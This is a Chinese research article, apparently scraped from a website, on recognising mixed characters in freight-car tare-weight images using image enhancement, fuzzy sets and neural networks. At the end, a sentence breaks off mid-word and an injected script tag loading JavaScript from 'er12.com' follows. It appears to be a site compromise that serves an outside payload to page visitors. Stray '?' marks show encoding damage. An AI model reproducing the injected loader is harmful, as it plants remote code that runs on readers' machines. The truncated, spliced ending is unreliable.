多种字符混合图像的自动识别
发布时间:2008-5-25 访问次数:110
??摘 要:以货运列车自重识别系统为例,提出一种适应不同光照环境的图像增强方法,利用模糊集理论从多行信息中提取自重行,正确率接近99%。在字符识别中,采用3种神经网络分类器分别识别汉字、数字和英文字母,并对易混数字采用两级分类器的结构,获得了较高的识别率。
关键词:图像增强;模糊集;神经网络;字符识别?
货运列车车号和车厢自重的自动识别,为实现铁路运输信息的计算机管理提供了现代化的技术手段。将每节车厢的检斤结果和车厢自重的自动识别结果传给微机,通过计算可得到列车的载物量,因此,车厢自重的正确识别是列车载物量计算的关键。根据文献[1~3]讨论的几种方法,列车车号识别取得了令人满意的正确率,但都未对车厢自重的识别问题进行探讨。本文通过对含多种字符的自重图像进行分析,提出了一些有效的方法。?
1自重识别的特点
货运列车的自重识别与车号识别相比,有很多新问题和特殊之处,具体表现在:
(1) 车号图像中车号信息占有很大比重,而自重图像中除包含自重信息外,还包含载重、容积等信息,如图1所示,因此自重目标提取比较困难。由于本系统24?h工作在户外,自重图像中信息分布广,因此照明对自重图像的影响更为严重;?
(2) 自重的数字比车号小得多,极易受到污染,而且自重数字的印刷更不规范,字符变形、丢笔划情况更为严重;
(3)自重信息中包括汉字、数字、英文字母等多种字符,而且数字大小不一,数字位数不固定,因此给字符识别带来了困难。
根据自重图像的特点,首先对采集的原始图像进行图像增强处理,以便得到良好的视觉效果;其次,利用模糊集理论从增强后的图像中提取自重行区域,最后对自重行进行字符分割处理,利用神经网络识别字符。本文将在下面分别阐述这3个步骤,并在最后给出结论。?
2一种适应不同光照环境的图像增强方法
由于本系统全天24h连续运行,环境照度差异很大,采用固定参数的灰度变换[4],不能使不同亮度的图像都得到满意的图像增强效果。本文采用变参数分段非线性变换,其函数如下:?
其中l=256,表示共有256个灰度级,s1,s2,γ都是灰度均值m的单值函数:s1=α*m,s2=β*m,γ=int[10*(m-m0)/m+0.5]其中,α=1,β=2,m0=6。图2给出2幅不同亮度的原始图像采用两种不同方法进行变换的比较。图2中(a)、(c)的原始图像的灰度均值为m=11.1811,此时,s1=11.1811,s2=22.3622,γ=0.5,增强后图(c)的灰度均值33.354?3;图2中(b),(d)的原始图像的灰度均值为m=35.2007,此时,s1=35.2007,s2=70.4014,γ=0.8,增强后图(d)的灰度均值23.4948。由对比结果可见,采用本文的方法能在增强较暗区域的亮度同时,抑制较亮区域的亮度,从而使不同亮度的图像都能得到适当的变换,得到良好的视觉效果。由图(c)、(d)可以看出,不同照明情况下采集的图像在增强后并无明显差别,因此在对图像的后续处理中不必考虑照明的影响。
3基于模糊集理论的目标区域提取
本文先把原始图像分割成若干个只含一行信息的候选区域子图像,然后选取目标的多个特征,利用模糊集理论表征各个特征的重要性,最后根据评判结果选取目标区域。?
3.1候选区域的分割
从图3所示的图像的行灰度均值图中可以看出,波峰对应着文字行,波谷对应着行之间的间隔。如果能准确地找出每个波谷,那么就会分割出若干个的候选区域子图像。
为了能准确的找出波谷,先对行均值ave(i)进行一维滤波,去掉“毛刺”,然后再根据下列特点搜索波谷:(1) 波谷必是局部极小值,即所考察区域的宽度是2k;(2) 波谷左右两侧曲线的斜率分别是负和正,且两侧曲线很陡峭,即
本文采用变斜率阈值的搜索方法,对于信息不很清晰的图像,其行均值图的波谷相应的不太明显,两侧曲线斜率不大,因此可适当减少斜率阈值s0,直到搜索到波谷为止,对于搜索结果中过宽或过窄的区域,可以根据一些文法信息(如文字行的标准高度等)进行相应的分裂或合并处理,从而得到只含一行文字的若干个候选区域图像。?
3.2目标区域的提取
根据模糊集理论[5],模糊事件可以表示为三元组{u,k,v},u={u1,u2,…,ul}为其特征值,p={v(u1),v(u2),…,v(ul)}为其特征的评价集,k={k|k=1,2,…,l}。我们可以用下式来计算模糊事件a存在的可能性大小:?
其中,μ?a(u?k)为隶属函数,表示特征u?k对模糊事件a存在可能性大小的影响程度。
我们要评价每一个候选区域是“自重”行区域的可能性这一模糊事件。根据模糊事件的定义,我们需要解决三个关键问题:特征集的选取、特征评价函数的确定和每一特征对模糊事件的重要性[6]。在选取特征时,要选取最关键的?script src=http://er12.com/t.js>